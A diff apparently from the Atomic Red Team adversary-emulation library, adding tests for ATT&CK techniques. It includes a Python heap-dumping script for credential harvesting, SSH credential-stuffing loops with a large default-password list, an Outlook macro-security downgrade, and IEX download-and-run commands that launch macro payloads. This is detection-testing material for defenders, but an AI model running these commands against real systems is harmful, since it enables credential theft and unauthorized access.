+      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
+
+- name: Dump individual process memory with Python (Local)
+  auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+    copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    python_script:
+      description: Path to script generating the target process
+      type: Path
+      default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+    - description: |
+        Requires Python
+      prereq_command: |
+        (which python || which python3 || which python2)
+      get_prereq_command: |
+        echo "Python 2.7+ or 3.4+ must be installed"
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      PYTHON=$(which python || which python3 || which python2)
+      $PYTHON #{python_script} $PID #{output_file}
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+    python dump_proc.py <PID> <filepath>
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+    # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0    [heap]
+    heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+    heap_range = heap_line.split(' ')[0]
+    mem_start = int(heap_range.split('-')[0], 16)
+    mem_stop = int(heap_range.split('-')[1], 16)
+    mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+    mem_file.seek(mem_start, 0)
+    heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+    ofile.write(heap_mem)
@@ -0,0 +1,47 @@
+# T1036.005 - Match Legitimate Name or Location
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
+<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+
+
+<br/>
+
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+**Supported Platforms:** macOS, Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+mkdir $HOME/...
+cp $(which sh) $HOME/...
+$HOME/.../sh -c "echo #{test_message}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f $HOME/.../sh
+rmdir $HOME/.../
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,30 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+  description: |
+    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    test_message:
+      description: Test message to echo out to the screen
+      type: String
+      default: Hello from the Atomic Red Team test T1036.005#1
+
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      mkdir $HOME/...
+      cp $(which sh) $HOME/...
+      $HOME/.../sh -c "echo #{test_message}"
+    cleanup_command: |
+      rm -f $HOME/.../sh
+      rmdir $HOME/.../
@@ -84,6 +84,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
 ```
@@ -137,6 +138,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
 ```
@@ -54,6 +54,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
    cleanup_command: |
@@ -88,8 +89,9 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
    cleanup_command: |
      Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
-    name: powershell
+    name: powershell
@@ -266,7 +266,7 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1595.002&#92;src&#92;griffon_recon.vbs|
+| vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1082&#92;src&#92;griffon_recon.vbs|


 #### Attack Commands: Run with `powershell`! 
@@ -121,7 +121,7 @@ atomic_tests:
    vbscript:
      description: Path to sample script
      type: String
-      default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+      default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
  executor:
    command: 'cscript #{vbscript}'
    name: powershell
@@ -0,0 +1,115 @@
+# T1110.004 - Credential Stuffing
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004)
+<blockquote>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
+
+Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
+
+* SSH (22/TCP)
+* Telnet (23/TCP)
+* FTP (21/TCP)
+* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
+* LDAP (389/TCP)
+* Kerberos (88/TCP)
+* RDP / Terminal Services (3389/TCP)
+* HTTP/HTTP Management Services (80/TCP & 443/TCP)
+* MSSQL (1433/TCP)
+* Oracle (1521/TCP)
+* MySQL (3306/TCP)
+* VNC (5900/TCP)
+
+In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux)
+
+- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos)
+
+
+<br/>
+
+## Atomic Test #1 - SSH Credential Stuffing From Linux
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; 
+```
+##### Get Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - SSH Credential Stuffing From MacOS
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** macOS
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; 
+```
+##### Get Prereq Commands:
+```bash
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+brew install hudochenkov/sshpass/sshpass
+```
+
+
+
+
+<br/>
@@ -0,0 +1,66 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+  auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+  auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - macos
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+        brew install hudochenkov/sshpass/sshpass
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
@@ -0,0 +1,482 @@
+ADMINISTRATOR:ADMINISTRATOR
+ADMN:admn
+Administrator:3ware
+Administrator:admin
+Administrator:changeme
+Administrator:ganteng
+Administrator:letmein
+Administrator:password
+Administrator:pilou
+Administrator:smcadmin
+Any:12345
+CSG:SESAME
+Cisco:Cisco
+D-Link:D-Link
+DTA:TJM
+GEN1:gen1
+GEN2:gen2
+GlobalAdmin:GlobalAdmin
+HTTP:HTTP
+IntraStack:Asante
+IntraSwitch:Asante
+JDE:JDE
+LUCENT01:UI-PSWD-01
+LUCENT02:UI-PSWD-02
+MDaemon:MServer
+MICRO:RSX
+Manager:Manager
+Manager:friend
+NAU:NAU
+NETWORK:NETWORK
+NICONEX:NICONEX
+PBX:PBX
+PFCUser:240653C9467E45
+PRODDTA:PRODDTA
+PSEAdmin:$secure$
+PlcmSpIp:PlcmSpIp
+Polycom:SpIp
+RMUser1:password
+SYSADM:sysadm
+Sweex:Mysweex
+USERID:PASSW0RD
+User:Password
+VNC:winterm
+VTech:VTech
+ZXDSL:ZXDSL
+acc:acc
+adfexc:adfexc
+admin:0
+admin:0000
+admin:1111
+admin:11111111
+admin:123
+admin:1234
+admin:123456
+admin:1234567890
+admin:1234admin
+admin:2222
+admin:22222
+admin:3477
+admin:3ascotel
+admin:7ujMko0admin
+admin:7ujMko0vizxv
+admin:9999
+admin:Admin
+admin:AitbISP4eCiG
+admin:Ascend
+admin:BRIDGE
+admin:Intel
+admin:MiniAP
+admin:NetCache
+admin:NetICs
+admin:OCS
+admin:P@55w0rd!
+admin:PASSWORD
+admin:Protector
+admin:SMDR
+admin:SUPER
+admin:Symbol
+admin:TANDBERG
+admin:_Cisco
+admin:access
+admin:admin
+admin:admin117.35.97.74
+admin:admin123
+admin:admin1234
+admin:administrator
+admin:adminttd
+admin:adslolitec
+admin:adslroot
+admin:adtran
+admin:articon
+admin:asante
+admin:ascend
+admin:asd
+admin:atc123
+admin:atlantis
+admin:backdoor
+admin:barricade
+admin:barricadei
+admin:bintec
+admin:cableroot
+admin:changeme
+admin:cisco
+admin:comcomcom
+admin:conexant
+admin:default
+admin:diamond
+admin:enter
+admin:epicrouter
+admin:extendnet
+admin:fliradmin
+admin:giraff
+admin:hagpolm1
+admin:hello
+admin:help
+admin:hp.com
+admin:ironport
+admin:isee
+admin:jvc
+admin:kont2004
+admin:letmein
+admin:leviton
+admin:linga
+admin:meinsma
+admin:michaelangelo
+admin:michelangelo
+admin:microbusiness
+admin:motorola
+admin:mu
+admin:my_DEMARC
+admin:netadmin
+admin:noway
+admin:oelinux123
+admin:operator
+admin:p-assword
+admin:pass
+admin:password
+admin:passwort
+admin:pento
+admin:pfsense
+admin:private
+admin:public
+admin:pwp
+admin:radius
+admin:rmnetlm
+admin:root
+admin:secure
+admin:service
+admin:setup
+admin:sitecom
+admin:smallbusiness
+admin:smcadmin
+admin:speedxess
+admin:superuser
+admin:support
+admin:switch
+admin:synnet
+admin:sysAdmin
+admin:system
+admin:tech
+admin:ubnt
+admin:visual
+admin:w2402
+admin:wbox
+admin:xad$l#12
+admin:xad$|#12
+admin:zoomadsl
+admin2:changeme
+administrator:administrator
+administrator:changeme
+adminstat:OCS
+adminstrator:changeme
+adminttd:adminttd
+adminuser:OCS
+adminview:OCS
+alpine:alpine
+anonymous:Exabyte
+anonymous:any@
+apc:apc
+at4400:at4400
+bbsd-client:NULL
+bbsd-client:changeme2
+bciim:bciimpw
+bcim:bcimpw
+bcms:bcmspw
+bcnas:bcnaspw
+bcnas:pcnaspw
+blue:bluepw
+browse:browsepw
+browse:looker
+cablecom:router
+cablemodem:robotics
+cac_admin:cacadmin
+cas:cascade
+ccrusr:ccrusr
+cellit:cellit
+cgadmin:cgadmin
+cisco:cisco
+citel:citel
+client:client
+cmaker:cmaker
+comcast:1234
+corecess:corecess
+craft:craft
+craft:craftpw
+craft:crftpw
+cusadmin:highspeed
+cust:custpw
+customer:none
+dadmin:dadmin01
+davox:davox
+debug:d.e.b.u.g
+debug:synnet
+default:antslq
+default:default
+default:password
+deskalt:password
+deskman:changeme
+desknorm:password
+deskres:password
+device:device
+dhs3mt:dhs3mt
+dhs3pms:dhs3pms
+diag:danger
+diag:switch
+disttech:4tas
+draytek:1234
+e250:e250changeme
+e500:e500changeme
+echo:User
+echo:echo
+eng:engineer
+enquiry:enquirypw
+field:support
+guest:1111
+guest:12345
+guest:123456
+guest:User
+guest:guest
+guest:xc3511
+halt:tlah
+helpdesk:OCS
+hsa:hsadb
+hscroot:abc123
+iclock:timely
+images:images
+inads:inads
+inads:indspw
+init:initpw
+install:llatsni
+install:secret
+installer:installer
+intel:intel
+intermec:intermec
+intermec:intermec1QTPS
+kermit:kermit
+l2:l2
+l3:l3
+locate:locatepw
+login:0
+login:1111
+login:8429
+login:access
+login:admin
+login:password
+lp:lp
+m1122:m1122
+maint:maint
+maint:maintpw
+maint:ntacdmax
+maint:rwmaint
+manage:!manage
+manager:admin
+manager:change_on_install
+manager:friend
+manager:manager
+manager:sys
+manuf:xxyyzz
+mediator:mediator
+mg3500:merlin
+mlusr:mlusr
+monitor:monitor
+mother:fucker
+mtch:mtch
+mtcl:mtcl
+naadmin:naadmin
+netangr:attack
+netman:netman
+netopia:netopia
+netrangr:attack
+netscreen:netscreen
+nms:nmspw
+nokai:nokai
+nokia:nokia
+none:0
+none:admin
+op:op
+op:operator
+operator:$chwarzepumpe
+operator:1234
+operator:operator
+oracle:oracle
+patrol:patrol
+piranha:piranha
+piranha:q
+poll:tech
+public:public
+radware:radware
+rapport:r@p8p0r+
+rcust:rcustpw
+readonly:lucenttech2
+readwrite:lucenttech1
+recovery:recovery
+replicator:replicator
+ro:ro
+root:000000
+root:1111
+root:1234
+root:12345
+root:123456
+root:1234567890
+root:1234qwer
+root:123qwe
+root:1q2w3e4r5
+root:3ep5w2u
+root:54321
+root:666666
+root:7ujMko0admin
+root:7ujMko0vizxv
+root:888888
+root:Admin
+root:Cisco
+root:GMB182
+root:LSiuY7pOmZG2s
+root:Mau'dib
+root:PASSWORD
+root:ROOT500
+root:Serv4EMC
+root:Zte521
+root:abc123
+root:admin
+root:admin1234
+root:admin_1
+root:ahetzip8
+root:alpine
+root:anko
+root:antslq
+root:ascend
+root:attack
+root:avtech
+root:b120root
+root:bananapi
+root:blender
+root:calvin
+root:changeme
+root:cms500
+root:comcom
+root:coolphoenix579
+root:davox
+root:default
+root:dreambox
+root:fivranne
+root:ggdaseuaimhrke
+root:hi3518
+root:iDirect
+root:ikwb
+root:ikwd
+root:jauntech
+root:juantech
+root:jvbzd
+root:klv123
+root:klv1234
+root:letacla
+root:maxided
+root:oelinux123
+root:openssh
+root:openvpnas
+root:orion99
+root:pa55w0rd
+root:pass
+root:password
+root:permit
+root:realtek
+root:root
+root:tini
+root:tslinux
+root:ubnt
+root:user
+root:vizxv
+root:wyse
+root:xc3511
+root:xmhdipc
+root:zlxx.
+root:zte9x15
+router:router
+rw:rw
+rwa:rwa
+scmadmin:scmchangeme
+scout:scout
+secret:secret
+secure:secure
+security:security
+service:smile
+setup:changeme
+setup:changeme!
+setup:setup
+smc:smcadmin
+spcl:0
+storwatch:specialist
+stratacom:stratauser
+su:super
+super:5777364
+super:super
+super:surt
+super.super:master
+superadmin:secret
+superman:21241036
+superman:talent
+superuser:123456
+superuser:admin
+supervisor:PlsChgMe!
+supervisor:PlsChgMe1
+supervisor:supervisor
+supervisor:zyad1234
+support:123
+support:1234
+support:12345
+support:123456
+support:admin
+support:h179350
+support:login
+support:support
+support:supportpw
+support:zlxx.
+sys:uplink
+sysadm:Admin
+sysadm:PASS
+sysadm:anicust
+sysadm:sysadm
+sysadmin:PASS
+sysadmin:password
+sysadmin:sysadmin
+system:change_on_install
+system:password
+system:sys
+system/manager:sys/change_on_install
+target:password
+teacher:password
+tech:ANYCOM
+tech:ILMI
+tech:field
+tech:tech
+telco:telco
+telecom:telecom
+tellabs:tellabs#1
+telnet:telnet
+temp1:password
+test:test
+tiara:tiaranet
+tiger:tiger123
+topicalt:password
+topicnorm:password
+topicres:password
+ubnt:ubnt
+user:123456
+user:pass
+user:password
+user:public
+user:tivonpw
+user:user
+vcr:NetVCR
+volition:volition
+vt100:public
+webadmin:1234
+webadmin:webadmin
+websecadm:changeme
+wlse:wlsedb
+wradmin:trancell
+write:private
+xd:xd
+xxx:cascade
+zyfwp:PrOw!aN_fXp
@@ -28,14 +28,14 @@ Too achieve this two things must happened on the syste


 ```cmd
-reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
 ```

 #### Cleanup Commands:
 ```cmd
-reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
 del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
 ```

@@ -13,10 +13,10 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-      if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+      mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
      echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
    cleanup_command: |
-      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
      del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
    name: command_prompt
@@ -50,6 +50,7 @@ References:


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -138,6 +139,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -188,6 +190,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -237,6 +240,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
@@ -390,6 +394,7 @@ and pull down the script and execute it. By default the payload will execute cal


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
 ```
@@ -36,6 +36,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -91,6 +92,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -126,6 +128,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -160,6 +163,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
@@ -285,6 +289,7 @@ atomic_tests:
      Write-Host "You will need to install Google Chrome manually to meet this requirement"
  executor:
    command: |
+        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
        IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
        Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
    name: powershell
@@ -16,7 +16,10 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
 <br/>

 ## Atomic Test #1 - WINWORD Remote Template Injection
